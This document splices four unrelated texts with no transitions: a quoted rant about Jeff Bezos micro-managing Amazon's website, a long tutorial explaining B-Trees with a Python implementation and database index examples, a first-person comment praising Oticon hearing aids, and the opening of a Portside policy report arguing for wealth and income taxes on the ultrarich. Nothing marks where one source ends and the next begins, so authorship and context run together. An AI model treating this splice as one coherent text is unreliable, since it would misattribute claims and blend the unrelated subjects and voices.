[1] "Jeff Bezos is an infamous micro-manager. He micro-manages every single pixel of Amazon's retail site. He hired Larry Tesler, Apple's Chief Scientist and probably the very most famous and respected human-computer interaction expert in the entire world, and then ignored every goddamn thing Larry said for three years until Larry finally -- wisely -- left the company. Larry would do these big usability studies and demonstrate beyond any shred of doubt that nobody can understand that frigging website, but Bezos just couldn't let go of those pixels, all those millions of semantics-packed pixels on the landing page. They were like millions of his own precious children. So they're all still there, and Larry is not."
https://gist.github.com/chitchcock/1281611
Your database has 10 million user records. You query for one user by ID. The database returns the result in 3 milliseconds. How?
If the database scanned all 10 million records sequentially, it would take seconds, maybe minutes. But databases don’t scan. They use an index—and that index is almost certainly a B-Tree.
Every major database system uses B-Trees: MySQL InnoDB, PostgreSQL, SQLite, MongoDB’s WiredTiger storage engine, Oracle Database, Microsoft SQL Server. It’s not a coincidence. B-Trees solve a fundamental problem: how to efficiently find data on disk when disk access is thousands of times slower than memory access.
This is the story of why binary search trees fail on disk, how B-Trees fix that problem, and why after 50+ years, we’re still using them.
Let’s start with what doesn’t work: binary search trees (BSTs) on disk.
In memory, binary search trees are excellent. Each node stores one key and has two children (left and right). Keys in the left subtree are smaller, keys in the right subtree are larger. Finding a key takes O(log₂ n) comparisons.
Figure 1: Binary search tree with 7 nodes. Finding key 11 takes 3 comparisons: 15 → 7 → 11.
For 1 million records, a balanced BST has height log₂(1,000,000) ≈ 20. That’s 20 comparisons to find any record.
In memory, this is fast.
Each comparison is a pointer dereference (~0.0001 milliseconds on modern CPUs). Total lookup: 0.002 ms.
On disk, this is catastrophic.
Here’s why:
The smallest unit of disk access is a block (typically 4 KB to 16 KB). To read a single byte from disk, you must read the entire block containing it.
Disk access times: an HDD seek costs roughly 10 ms and an SSD read roughly 0.1 ms, compared with on the order of 100 nanoseconds for RAM. Disk is 100-100,000x slower than RAM.
With a BST on disk, each node is stored in a separate disk block. Traversing from parent to child requires a disk seek.
For 1 million records:
Height: 20 nodes
Disk seeks: 20
Time on HDD: 20 × 10 ms = 200 milliseconds
Time on SSD: 20 × 0.1 ms = 2 milliseconds
That’s acceptable for SSDs, but terrible for HDDs. And it gets worse as the tree grows.
For 1 billion records:
Height: 30 nodes
Disk seeks: 30
Time on HDD: 30 × 10 ms = 300 milliseconds
Time on SSD: 30 × 0.1 ms = 3 milliseconds
The fundamental problem:
BST fanout is too low (only 2 children per node). We need more children per node to reduce tree height.
You might think: “Just keep the tree balanced!” Red-black trees and AVL trees do this.
The problem isn’t just tree height—it’s maintenance cost. Balancing requires rotating nodes and updating pointers. In memory, this is cheap (a few pointer writes). On disk, it’s expensive:
Read the node from disk (4 KB block)
Modify the node in memory
Write the modified node back to disk (4 KB block)
Update parent pointers (more disk I/O)
For a tree with frequent inserts and deletes, constant rebalancing kills performance. We need a data structure that:
Has high fanout (many children per node) → reduces height
Keeps rebalancing cheap → few disk reads and writes per insert or delete
A B-Tree is a self-balancing tree optimized for disk access. Instead of 2 children per node (binary tree), a B-Tree node has hundreds or thousands of children.
Key idea:
Each B-Tree node fits in one disk block (4 KB to 16 KB). Since we must read an entire block anyway, pack as many keys as possible into it.
A B-Tree node stores:
N keys (sorted)
N + 1 pointers to child nodes
Each key acts as a separator: keys in child[i] are less than key[i], keys in child[i+1] are greater than or equal to key[i].
Figure 2: B-Tree with fanout ~100. Root has 2 keys and 3 children. Internal nodes have 4 keys and 5 children. Leaf nodes contain actual data.
B-Trees have three types of nodes:
Root node:
The top of the tree. There’s always exactly one root.
Internal nodes:
Middle layers that guide searches. They store separator keys and pointers, but no actual data.
Leaf nodes:
Bottom layer containing the actual data (key-value pairs). All leaves are at the same depth.
This is a B+-Tree, the most common variant. B+-Trees store data only in leaves, while B-Trees can store data in internal nodes too. Every major database uses B+-Trees, but calls them “B-Trees” for simplicity.
Binary tree (fanout = 2):
1 million records → height = 20
1 billion records → height = 30
B-Tree (fanout = 100):
1 million records → height = 3 (because 100³ = 1,000,000)
1 billion records → height = 5 (because 100⁴ = 100,000,000 is still too small)
Finding a key in a B-Tree is a root-to-leaf traversal with binary search at each node.
Algorithm:
Start at the root node
Binary search the keys in the current node to find the separator key range
Follow the corresponding child pointer
Repeat until reaching a leaf node
In the leaf, either find the key or conclude it doesn’t exist
Time complexity:
Tree height: O(log_fanout n)
Binary search per node: O(log₂ fanout)
Total: O(log n)
Example:
Find key 72 in a B-Tree with fanout 100 and 1 million records.
Step 1: Read root node (1 disk I/O)
Keys: [50, 100, 150, ...]
72 is between 50 and 100
Follow child pointer 2
Step 2: Read internal node (1 disk I/O)
Keys: [55, 60, 65, 70, 75, 80, ...]
72 is between 70 and 75
Follow child pointer 5
Step 3: Read leaf node (1 disk I/O)
Keys: [71, 72, 73, 74]
Found! Return value for key 72
Total: 3 disk I/O operations = 30 ms on HDD, 0.3 ms on SSD
Let’s implement a simplified but functional B-Tree in Python.
from typing import List, Optional
from dataclasses import dataclass, field


@dataclass
class BTreeNode:
    """
    B-Tree node storing keys and child pointers.

    Attributes:
        keys: Sorted list of keys in this node
        children: List of child node pointers (len = len(keys) + 1)
        is_leaf: True if this is a leaf node (no children)

    Invariants:
        - len(children) == len(keys) + 1 (for internal nodes)
        - All keys are sorted
        - Keys in children[i] < keys[i] < keys in children[i+1]
    """
    keys: List[int] = field(default_factory=list)
    children: List['BTreeNode'] = field(default_factory=list)
    is_leaf: bool = True

    def __repr__(self):
        return f"BTreeNode(keys={self.keys}, is_leaf={self.is_leaf})"


class BTree:
    """
    B-Tree implementation with configurable order.

    Attributes:
        order: Maximum number of children per node (fanout)
        root: Root node of the tree

    Properties:
        - Each node has at most (order - 1) keys
        - Each non-root node has at least (order // 2 - 1) keys
        - Tree height is O(log_order n)

    Time Complexity:
        - Search: O(log n)
        - Insert: O(log n)
        - Delete: O(log n)

    Space Complexity: O(n)
    """

    def __init__(self, order: int = 100):
        """
        Initialize B-Tree.

        Args:
            order: Maximum number of children per node (fanout).
                   Higher order = fewer levels but larger nodes.
                   Typical values: 100-1000 for disk-based storage.
        """
        if order < 3:
            raise ValueError("Order must be at least 3")
        self.order = order
        self.root = BTreeNode()

    def search(self, key: int) -> Optional[int]:
        """
        Search for a key in the B-Tree.

        Args:
            key: The key to search for

        Returns:
            The key if found, None otherwise

        Time Complexity: O(log n) where n is number of keys
        """
        return self._search_recursive(self.root, key)

    def _search_recursive(self, node: BTreeNode, key: int) -> Optional[int]:
        """
        Recursively search for key starting from node.

        Uses binary search within each node to find the correct child.
        """
        # Binary search within this node
        i = self._binary_search(node.keys, key)

        # Found exact match
        if i < len(node.keys) and node.keys[i] == key:
            return key

        # Reached leaf without finding key
        if node.is_leaf:
            return None

        # Recurse into appropriate child
        # (In real implementation, this would be a disk I/O)
        return self._search_recursive(node.children[i], key)

    def _binary_search(self, keys: List[int], key: int) -> int:
        """
        Binary search to find insertion point for key.

        Returns:
            Index i where keys[i-1] < key <= keys[i]

        Time Complexity: O(log m) where m is number of keys in node
        """
        left, right = 0, len(keys)
        while left < right:
            mid = (left + right) // 2
            if keys[mid] < key:
                left = mid + 1
            else:
                right = mid
        return left

    def insert(self, key: int):
        """
        Insert a key into the B-Tree.

        Args:
            key: The key to insert

        Time Complexity: O(log n)

        Algorithm:
            1. Find the appropriate leaf node
            2. Insert key into leaf
            3. If leaf overflows (too many keys), split it
            4. Propagate split up the tree if necessary
        """
        root = self.root
        # If root is full, split it and create new root
        if len(root.keys) >= self.order - 1:
            new_root = BTreeNode(is_leaf=False)
            new_root.children.append(self.root)
            self._split_child(new_root, 0)
            self.root = new_root
        self._insert_non_full(self.root, key)

    def _insert_non_full(self, node: BTreeNode, key: int):
        """
        Insert key into a node that is not full.

        Recursively finds the correct leaf and inserts.
        """
        i = len(node.keys) - 1
        if node.is_leaf:
            # Insert into sorted position
            node.keys.append(None)  # Make space
            while i >= 0 and key < node.keys[i]:
                node.keys[i + 1] = node.keys[i]
                i -= 1
            node.keys[i + 1] = key
        else:
            # Find child to insert into
            while i >= 0 and key < node.keys[i]:
                i -= 1
            i += 1
            # Split child if it's full
            if len(node.children[i].keys) >= self.order - 1:
                self._split_child(node, i)
                if key > node.keys[i]:
                    i += 1
            self._insert_non_full(node.children[i], key)
    def _split_child(self, parent: BTreeNode, child_index: int):
        """
        Split a full child node into two nodes.

        Args:
            parent: Parent node containing the full child
            child_index: Index of the full child in parent.children

        Algorithm:
            1. Create new sibling node
            2. Move half of keys from full child to sibling
            3. Promote middle key to parent
            4. Update parent's children list
        """
        full_child = parent.children[child_index]
        new_sibling = BTreeNode(is_leaf=full_child.is_leaf)
        mid = (self.order - 1) // 2

        # Grab the middle key *before* truncating the full child's key list
        promoted_key = full_child.keys[mid]

        # Move the upper half of the keys to the new sibling
        new_sibling.keys = full_child.keys[mid + 1:]
        full_child.keys = full_child.keys[:mid]

        # Move half the children if not a leaf
        if not full_child.is_leaf:
            new_sibling.children = full_child.children[mid + 1:]
            full_child.children = full_child.children[:mid + 1]

        # Promote middle key to parent
        parent.keys.insert(child_index, promoted_key)
        parent.children.insert(child_index + 1, new_sibling)
    def print_tree(self, node: Optional[BTreeNode] = None, level: int = 0):
        """
        Print tree structure for debugging.
        """
        if node is None:
            node = self.root
        print("  " * level + f"Level {level}: {node.keys}")
        if not node.is_leaf:
            for child in node.children:
                self.print_tree(child, level + 1)


# Example usage and demonstration
if __name__ == "__main__":
    # Create B-Tree with order 5 (max 4 keys per node)
    btree = BTree(order=5)

    # Insert keys
    keys = [10, 20, 5, 6, 12, 30, 7, 17, 3, 16, 21, 24, 25, 26, 27]
    print("Inserting keys:", keys)
    for key in keys:
        btree.insert(key)

    print("\nB-Tree structure:")
    btree.print_tree()

    # Search for keys
    print("\nSearching for keys:")
    for search_key in [6, 16, 21, 100]:
        result = btree.search(search_key)
        if result:
            print(f"  Key {search_key}: FOUND")
        else:
            print(f"  Key {search_key}: NOT FOUND")

    # Demonstrate disk I/O count
    print("\n--- Performance Analysis ---")
    print(f"Tree order (fanout): {btree.order}")
    print(f"Max keys per node: {btree.order - 1}")

    # Estimate tree height for large datasets
    def estimate_height(num_records: int, fanout: int) -> int:
        """Estimate tree height for given number of records and fanout."""
        import math
        return math.ceil(math.log(num_records, fanout))

    datasets = [
        ("1 thousand", 1_000),
        ("1 million", 1_000_000),
        ("1 billion", 1_000_000_000),
    ]
    fanouts = [5, 100, 1000]

    print("\nEstimated tree height (= disk seeks):")
    print(f"{'Dataset':<15} {'Fanout=5':<10} {'Fanout=100':<12} {'Fanout=1000':<12}")
    for name, size in datasets:
        heights = [estimate_height(size, f) for f in fanouts]
        print(f"{name:<15} {heights[0]:<10} {heights[1]:<12} {heights[2]:<12}")

    print("\nDisk access time on HDD (10ms per seek):")
    print(f"{'Dataset':<15} {'Fanout=5':<10} {'Fanout=100':<12} {'Fanout=1000':<12}")
    for name, size in datasets:
        times = [f"{estimate_height(size, f) * 10}ms" for f in fanouts]
        print(f"{name:<15} {times[0]:<10} {times[1]:<12} {times[2]:<12}")
Output:
Inserting keys: [10, 20, 5, 6, 12, 30, 7, 17, 3, 16, 21, 24, 25, 26, 27]
B-Tree structure:
Level 0: [10, 20, 25]
  Level 1: [3, 5, 6, 7]
  Level 1: [12, 16, 17]
  Level 1: [21, 24]
  Level 1: [26, 27, 30]
Searching for keys:
Key 6: FOUND
Key 16: FOUND
Key 21: FOUND
Key 100: NOT FOUND
--- Performance Analysis ---
Tree order (fanout): 5
Max keys per node: 4
Estimated tree height (= disk seeks):
Dataset Fanout=5 Fanout=100 Fanout=1000
1 thousand 5 2 1
1 million 9 3 2
1 billion 13 5 3
Disk access time on HDD (10ms per seek):
Dataset Fanout=5 Fanout=100 Fanout=1000
1 thousand 50ms 20ms 10ms
1 million 90ms 30ms 20ms
1 billion 130ms 50ms 30ms
Why this implementation works:
Each node stores up to
order - 1
keys
Split operation maintains the B-Tree invariants
Binary search within nodes reduces comparisons
Tree height stays logarithmic
When you insert a key into a full leaf node, the node must split.
Split algorithm:
Find the midpoint of the full node
Create a new sibling node
Move half the keys to the new node
Promote the middle key to the parent
If parent is full, split it recursively
Figure 3: Node split during insertion. The full node is split at the midpoint, and the middle key (30) is promoted to the parent.
When splits propagate to the root:
The root is split into two nodes
A new root is created with one key (the promoted key from the old root)
Tree height increases by 1
This is the only way tree height increases in a B-Tree.
B-Trees grow upward from the leaves, not downward from the root.
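You can watch this happen with the BTree class from the listing above (a quick test harness of my own, assuming that class is in scope, not part of the original code):

    # Walk leftmost children to measure depth; all leaves sit at the same level.
    def tree_height(tree: "BTree") -> int:
        node, height = tree.root, 1
        while not node.is_leaf:
            node = node.children[0]
            height += 1
        return height

    bt = BTree(order=5)
    last = 0
    for i in range(1, 501):
        bt.insert(i)
        h = tree_height(bt)
        if h != last:
            print(f"height became {h} after inserting {i} keys")
            last = h

Height only ticks up at the moments the root splits; every other insert leaves the depth unchanged.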
When you delete a key from a node and it becomes too empty (below 50% capacity), it merges with a sibling.
Merge algorithm:
Copy all keys from right sibling to left sibling
Demote the separator key from parent into the merged node
Remove the right sibling
If parent becomes too empty, merge it recursively
Figure 4: Node merge during deletion. When the right node becomes too empty, it merges with the left node, pulling the separator key from the parent.
When merges propagate to the root:
If the root has only one child after a merge, that child becomes the new root
Tree height decreases by 1
Splits and merges keep the tree balanced. All leaf nodes remain at the same depth, ensuring consistent query performance.
Time complexity:
O(log n)
For a tree with n keys and fanout f:
Tree height: log_f(n)
Binary search per node: log₂(f)
Total comparisons: log_f(n) × log₂(f) = O(log n)
Disk I/O:
log_f(n) disk reads (one per level)
Time complexity:
O(log n)
Lookup to find insertion point: O(log n)
Insert into leaf: O(f) to shift keys
Split if necessary: O(f) to move keys
Splits propagate up: O(log n) levels in worst case
Disk I/O:
O(log n) disk reads + O(log n) disk writes
Time complexity:
O(log n)
Lookup to find key: O(log n)
Delete from leaf: O(f) to shift keys
Merge if necessary: O(f) to move keys
Merges propagate up: O(log n) levels in worst case
Disk I/O:
O(log n) disk reads + O(log n) disk writes
Space:
O(n)
Each key is stored once. Internal nodes add overhead (pointers and separator keys), but this is typically 10-20% of data size.
Occupancy:
Nodes are typically 50-90% full. Higher fanout improves space efficiency because pointer overhead becomes proportionally smaller.
Every major database uses B-Trees (or B+-Trees) for indexes.
InnoDB uses B+-Trees for:
Primary key index
(clustered index): Stores actual row data in leaf nodes
Secondary indexes
: Store pointers to primary key in leaf nodes
InnoDB B-Tree configuration:
Page size: 16 KB (default)
Fanout: ~100-200 depending on key size
Tree height for 1 million rows: 3-4 levels
Example:
-- Create table with primary key
CREATE TABLE users (
id INT PRIMARY KEY,
name VARCHAR(100),
email VARCHAR(100)
) ENGINE=InnoDB;
-- Primary key automatically creates a clustered B+-Tree index
-- Leaf nodes contain the actual row data
-- Tree structure: id=1 stored with name and email in leaf
-- Create secondary index on email
CREATE INDEX idx_email ON users(email);
-- Secondary index is a separate B+-Tree
-- Leaf nodes contain email → id mappings
-- To fetch full row: lookup email in idx_email → get id → lookup id in primary key
InnoDB query performance:
-- Fast: Uses B-Tree index
SELECT * FROM users WHERE id = 12345;
-- Disk I/O: 3-4 reads (tree height)
-- Slow: Full table scan
SELECT * FROM users WHERE name = ‘Alice’;
-- Disk I/O: 10,000+ reads (scan all pages)
-- Fast: Uses secondary index
SELECT * FROM users WHERE email = ‘alice@example.com’;
-- Disk I/O: 6-8 reads (3-4 for idx_email + 3-4 for primary key)
PostgreSQL uses B-Trees as the default index type.
PostgreSQL B-Tree configuration:
Page size: 8 KB (default)
Fanout: ~50-100 depending on key size
Supports multiple index types (B-Tree, Hash, GiST, GIN, BRIN), but B-Tree is default
Example:
-- Default index is B-Tree
CREATE INDEX idx_user_id ON users(id);
-- Explicitly specify B-Tree
CREATE INDEX idx_user_email ON users USING BTREE(email);
-- View index structure
SELECT * FROM pg_indexes WHERE tablename = ‘users’;
SQLite uses B-Trees for both tables and indexes.
SQLite B-Tree configuration:
Page size: 4 KB (default, configurable to 64 KB)
Fanout: ~50-100
All data is stored in B-Trees (no separate heap storage)
Interesting fact:
SQLite's file format uses two B-Tree flavours: table B-Trees, which behave like B+-Trees with the row data stored in the leaves, and index B-Trees, which store only keys.
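One easy way to see SQLite walking an index B-Tree is EXPLAIN QUERY PLAN via Python's built-in sqlite3 module (my own throwaway example; the table and index names are made up):

    import sqlite3

    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT)")
    conn.execute("CREATE INDEX idx_email ON users(email)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [(i, f"user{i}@example.com") for i in range(1000)])

    # The plan's detail column should mention something like:
    #   SEARCH users USING INDEX idx_email (email=?)
    for row in conn.execute("EXPLAIN QUERY PLAN SELECT * FROM users WHERE email = ?",
                            ("user42@example.com",)):
        print(row)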
MongoDB’s WiredTiger storage engine uses B-Trees for indexes.
WiredTiger B-Tree configuration:
Internal page size: 4 KB (default)
Leaf page size: 32 KB (default)
Fanout: ~100-200
Supports prefix compression to increase fanout
Example:
// MongoDB creates B-Tree index on _id by default
db.users.insertOne({ _id: 1, name: “Alice”, email: “alice@example.com” });
// Create secondary index (B-Tree)
db.users.createIndex({ email: 1 });
// Query uses B-Tree index
db.users.find({ email: “alice@example.com” });
// Disk I/O: 3-4 reads (tree height)
// Explain shows index usage
db.users.find({ email: “alice@example.com” }).explain();
// Output: “indexName”: “email_1”, “stage”: “IXSCAN”
B-Trees are not perfect. Here’s when they struggle:
Write amplification: every insert may trigger splits all the way to the root, so in the worst case one logical write becomes several physical page writes.
Example:
Inserting 1 million keys with frequent splits:
Logical writes: 1 million
Physical writes (with splits): 2-3 million
Write amplification: 2-3x
Alternative:
LSM-Trees (Log-Structured Merge Trees) used by RocksDB, Cassandra, and LevelDB. LSM-Trees batch writes in memory and flush sequentially to disk, avoiding in-place updates.
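For intuition only, here is a toy sketch of the LSM idea: buffer writes in memory, then flush them as sorted, immutable runs (a deliberate simplification of mine, nothing like RocksDB's actual implementation):

    class ToyLSM:
        """Toy log-structured store: buffered writes, sorted immutable segments."""
        def __init__(self, memtable_limit: int = 4):
            self.memtable = {}       # recent writes, held in memory
            self.segments = []       # flushed, sorted (key, value) runs, newest last
            self.memtable_limit = memtable_limit

        def put(self, key, value):
            self.memtable[key] = value
            if len(self.memtable) >= self.memtable_limit:
                # One sequential write of a sorted run, instead of in-place page updates.
                self.segments.append(sorted(self.memtable.items()))
                self.memtable = {}

        def get(self, key):
            if key in self.memtable:
                return self.memtable[key]
            for segment in reversed(self.segments):   # newest segment wins
                for k, v in segment:
                    if k == key:
                        return v
            return None

    store = ToyLSM()
    for i in range(10):
        store.put(i, f"value-{i}")
    print(store.get(3), len(store.segments))

Writes never touch existing data on disk, which is exactly the property that helps write-heavy workloads; the price is that reads may have to consult several segments.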
B-Trees are optimized for range queries on the indexed key, but struggle with multi-column range queries.
Example:
-- Fast: Range query on indexed column
SELECT * FROM orders WHERE order_date BETWEEN ‘2024-01-01’ AND ‘2024-12-31’;
-- B-Tree traverses leaf nodes sequentially (leaf nodes are linked)
-- Slow: Range query on non-indexed column
SELECT * FROM orders WHERE total_amount BETWEEN 100 AND 200;
-- Must scan entire table (no index on total_amount)
-- Slow: Multi-column range query
CREATE INDEX idx_date_amount ON orders(order_date, total_amount);
SELECT * FROM orders WHERE order_date > ‘2024-01-01’ AND total_amount > 100;
-- B-Tree can use order_date range, but must filter total_amount in memory
Alternative:
Multi-dimensional indexes like R-Trees (for spatial data) or hybrid indexes.
To avoid disk I/O, databases cache frequently accessed B-Tree nodes in memory. For a large database:
1 billion records
Tree height: 4 levels
Internal nodes: ~1 million
Cache size: ~16 GB (to cache all internal nodes)
Rule of thumb:
Plan for 10-20% of your database size in RAM for B-Tree caches.
After many inserts and deletes, B-Tree nodes may be only 50-60% full. This wastes space and increases tree height.
Solution:
Periodic VACUUM (PostgreSQL) or OPTIMIZE TABLE (MySQL) to rebuild B-Trees.
Example:
-- PostgreSQL: Rebuild table and indexes
VACUUM FULL users;
-- MySQL: Optimize table (rebuilds B-Tree)
OPTIMIZE TABLE users;
B-Trees require locking during splits and merges. In high-concurrency workloads, lock contention can bottleneck writes.
Solution:
Latch-free B-Trees (used in modern databases like Microsoft SQL Server) or MVCC (Multi-Version Concurrency Control).
B-Trees are excellent for disk-based sorted data, but not always optimal:
If you’re doing 100,000 writes/sec with few reads, LSM-Trees outperform B-Trees.
Comparison: B-Trees update pages in place, which favors reads but amplifies writes; LSM-Trees buffer writes in memory and flush them sequentially, trading read amplification for write throughput.
Examples:
B-Tree: MySQL, PostgreSQL, SQLite
LSM-Tree: RocksDB, Cassandra, LevelDB
If your entire dataset fits in RAM, B-Trees add unnecessary complexity. Hash indexes or skip lists are simpler and faster.
Comparison: a B-Tree's block-oriented layout buys little in RAM; hash indexes give O(1) point lookups and skip lists give simpler ordered access.
Examples:
Hash index: Memcached, Redis hashes
Skip list: Redis sorted sets
For large analytical queries scanning millions of rows, columnar storage (e.g., Parquet, ORC) outperforms B-Trees.
Comparison: B-Tree row storage reads whole rows even when a query touches a single column; columnar formats scan and compress each column independently.
Examples:
Row storage (B-Tree): MySQL, PostgreSQL
Columnar storage: Parquet (used by Snowflake, BigQuery), ORC (used by Hive)
After 50+ years, B-Trees remain the dominant on-disk data structure because they:
Minimize disk I/O:
High fanout reduces tree height
Balance automatically:
Splits and merges keep all leaves at the same depth
Support range queries:
Sorted keys and leaf-level links enable efficient scans
Work on any disk:
Optimized for both HDDs (sequential I/O) and SSDs (block-level access)
Key insight:
B-Trees match the constraints of disk storage. Since the smallest I/O unit is a block, B-Trees pack as much data as possible into each block. This simple idea—maximizing fanout to minimize height—makes databases fast.
When to use B-Trees:
Disk-based storage (database indexes)
Frequent reads and moderate writes
Range queries on sorted data
General-purpose OLTP workloads
When to consider alternatives:
Write-heavy workloads (LSM-Trees)
In-memory data (hash indexes, skip lists)
Analytical queries (columnar storage)
Every time you query your database and get a result in milliseconds, thank the B-Tree.
This article is based on Chapter 2 (”B-Tree Basics”) of
Database Internals: A Deep Dive into How Distributed Data Systems Work
by Alex Petrov (O’Reilly, 2019).
Additional resources:
Bayer, R., & McCreight, E. (1972). “Organization and Maintenance of Large Ordered Indexes.”
Acta Informatica
, 1(3), 173-189.
https://doi.org/10.1007/BF00288683
Petrov, A. (2019).
Database Internals: A Deep Dive into How Distributed Data Systems Work
. O’Reilly Media. ISBN: 978-1492040347
Knuth, D. E. (1998).
The Art of Computer Programming, Volume 3: Sorting and Searching (2nd Ed.)
. Addison-Wesley. ISBN: 978-0201896855
Graefe, G. (2011).
Modern B-Tree Techniques
. Now Publishers. ISBN: 978-1601984197
Thanks for reading!
If you found this deep-dive helpful, subscribe to
m3mo Bytes
for more technical explorations of databases, distributed systems, and data structures.
Have you worked with B-Trees or database indexes? What performance challenges have you faced? Share your experiences in the comments—I read and respond to every one.
What database systems have you worked with? (MySQL, PostgreSQL, MongoDB?)
Have you encountered B-Tree performance bottlenecks in production?
What index strategies have worked well for your workload?
Have you compared B-Trees to LSM-Trees for write-heavy workloads?
Any interesting query optimization stories with indexes?
I have worn hearing aids since childhood in the '90s. Moderate sloping to profound loss. Been through all the tech since the equalized analog era.
For a while now, like the last 15 to 20 years, since hearing aids went DSP, I had not been much impressed by each new generation. At the risk of sounding like a bit of an advertisement, that changed this year.
I have the new Oticon Intent. RIC style aid. They have some of the best spatial awareness I've experienced. They're capable of quite a lot of directionality - accelerometer and three microphones in each. I had to have the intensity of the directionality turned down a bit. It was startling me when I turned my head and I wasn't hearing things behind me enough. But that's at the expense of less signal due to more environmental noise.
The machine-learning based noise reduction is an improvement over the previous generations, too.
They have a music mode. It drops all the speech remapping and noise reduction and just makes things feel loud. It's some sort of perceptual algorithm: in my case, as I turn up the volume it gets more and more treble, because only at the loudest volumes would I hear those high frequencies. All of this while being power-limited at 95 dB SPL, so I know I'm not blowing out my ears. It's nice not to have to worry about whether it's too loud.
Raising Taxes on the Ultrarich
Portside
portside.org
2025-11-24 02:22:55
The public has supported raising taxes on the ultrarich and corporations for years, but policymakers have not responded. Small increases in taxes on the rich that were instituted during times of Democratic control of Congress and the White House have been consistently swamped by larger tax cuts passed during times of Republican control. This was most recently reflected in the massive budget reconciliation bill pushed through Congress exclusively by Republicans and signed by President Trump. This bill extended the large tax cuts first passed by Trump in 2017 alongside huge new cuts in public spending. This one-step-forward, two-steps-back dynamic has led to large shortfalls of federal revenue relative to both existing and needed public spending.
Raising taxes on the ultrarich and corporations is necessary for both economic and political reasons. Economically, preserving and expanding needed social insurance and public investments will require more revenue. Politically, targeting the ultrarich and corporations as sources of the first tranche of this needed new revenue can restore faith in the broader public that policymakers can force the rich and powerful to make a fair contribution. Once the public has more faith in the overall fairness of the tax system, future debates about taxes can happen on much more constructive ground.
Policymakers should adopt the following measures:
Tax wealth (or the income derived from wealth) at rates closer to those applied to labor earnings. One way to do this is to impose a wealth tax on the top 0.1% of wealthy households.
Restore effective taxation of large wealth dynasties. One way to do this would be to convert the estate tax to a progressive inheritance tax.
Impose a high-income surtax on millionaires.
Raise the top marginal income tax rate back to pre-2017 levels.
Close tax loopholes for the ultrarich and corporations.
Introduction
The debate over taxation in the U.S. is in an unhealthy state. The public is deeply distrustful of policymakers and doesn’t believe that they will ever put typical families’ interests over those of the rich and powerful. In tax policy debates, this means that people are often highly skeptical of any proposed tax increases, even when they are told it will affect only (or, at least, overwhelmingly) the very rich. People are also so hungry to see any benefit at all, no matter how small, that they are often willing to allow huge tax cuts for the ultrarich in tax cut packages if those packages include any benefit to them as well. The result has been a continued downward ratchet of tax rates across the income distribution.¹
This is a terrible political dynamic for U.S. economic policy, given the pressing national needs for more revenue.
As countries get richer and older, the need for a larger public sector naturally grows.² Yet the share of national income collected in taxes by the U.S. government has stagnated since the late 1970s. This has left both revenue and public spending in the United States at levels far below those of advanced country peers.³ This stifling of resources available for the public sector is not only inefficient but has led to frustration over its inability to perform basic functions. The political root of this suppression of resources for the public sector is a series of successful Republican pushes to lower tax rates for the richest households and corporations. This attempt to use tax policy to increase inequality has amplified other policy efforts that have increased inequality in pre-tax incomes, leading to suppressed growth in incomes and declining living standards for low- and middle-income households and a degraded public sector.⁴
In recent decades the dominant strategy for many on the center–left to combat the public’s tax skepticism has been to pair tax increases with spending increases for programs that lawmakers hope will be popular enough to justify the taxes. This strategy has worked in the sense that some tax increases have been passed in the same legislation that paid for valuable expansions of income support, social insurance, and public investment programs in recent years. But this strategy has not stopped the damaging political dynamic leading to the sustained downward ratchet of tax revenue and the tax rates granted to the ultrarich and corporations.⁵
Part of the problem with a strategy of trying to attach tax increases to allegedly more popular spending increases is that it takes time for spending programs to become popular. The Affordable Care Act (ACA), for example, was not particularly popular in the year of its passage but has survived numerous efforts to dislodge it and has seemingly become more popular over time. Conversely, the expanded Child Tax Credit (CTC) that was in effect in 2021 and cut child poverty in half only lasted a single year, so there was little organic public pressure on Congress to ensure it continued.
In this report, we suggest another strategy for policymakers looking to build confidence in the broader public that tax policy can be made fairer: Target stand-alone tax increases unambiguously focused on ultrarich households and corporations as the first priority of fiscal policy. The revenue raised from this set of confidence-building measures can be explicitly aimed at closing the nation’s fiscal gap (the combination of tax increases or spending cuts needed to stabilize the ratio of public debt to national income).⁶ Once this gap has been closed with just highly progressive taxes, the public debate about the taxes needed to support valuable public investments and welfare state expansions should be on much more fruitful ground.
This approach takes seriously the work of scholars like Williamson (2017), who argue that the U.S. public is not rigidly “anti-tax.” Indeed, this public often views taxpaying as a civic responsibility and moral virtue. Yet they have become convinced that too many of their fellow citizens are not making a fair and adequate contribution. Part of this perception rests on underestimating the taxes paid by the poor and working people, but a good part of this perception also rests on the accurate impression that many rich households and corporations are not paying their fair share. Policy can change this latter perception, particularly if the policy is explicitly identified with ensuring that the rich and corporations—and only the rich and corporations—will see their taxes increase.
The rest of this report describes a number of tax policy changes that would raise revenue from the rich and corporations with extremely small (often zero) spillover into higher taxes for anybody else. It also provides rough revenue estimates of how much each could raise. It is not exhaustive, but it demonstrates that the nation’s current fiscal gap could certainly be closed with only taxes on the very rich. Making this policy agenda and target explicit could go a long way to restoring trust and improving the quality of the debate about taxes.
Targeting the ultrarich
The vast majority (often 100%) of the tax policy changes discussed below would only affect the taxes paid by the top 1% or above (those making well over $563,000 in adjusted gross income in 2024). Many of the taxes—and the vast majority of the revenue raised—will actually come from households earning well above this amount. We will be more specific about the incidence of each tax in the detailed descriptions below. The tax policy changes fall into two categories: increasing the tax rates the rich and ultrarich pay and closing the tax loopholes they disproportionately benefit from. We first present the tax rate changes, and we list them in declining order of progressivity.
Both the rate changes and the loophole closers disproportionately focus on income derived from wealth. By far the biggest reason why rich households’ tax contributions are smaller than many Americans think is appropriate has to do with rich households’ source of income. So much of these households’ income derives from wealth, and the U.S. federal tax system taxes income derived from wealth more lightly than income derived from work. If policymakers are unwilling to raise taxes on income derived from wealth, the tax system can never be made as fair as it needs to be.
Levying a wealth tax on the top 0.1% or above of wealthy households
The WhyNot Initiative (WNI) on behalf of Tax the Greedy Billionaires (TGB) has proposed a wealth tax of 5% on wealth over $50 million, with rates rising smoothly until they hit 10% at $250 million in wealth and then plateauing. With this much wealth, even a household making just a 1% return on their wealth holdings would receive an income that would put them in the top 1% of the income distribution. A more realistic rate of return (say, closer to 7%) would have them in the top 0.1% of income.
The $50 million threshold roughly hits at the top 0.1% of net worth among U.S. families, so this tax is, by construction, extremely progressive—only those universally acknowledged as extremely wealthy would pay a penny in additional tax. The WNI proposal also imposes a steep exit tax, should anybody subject to the tax attempt to renounce their U.S. citizenship to avoid paying it.
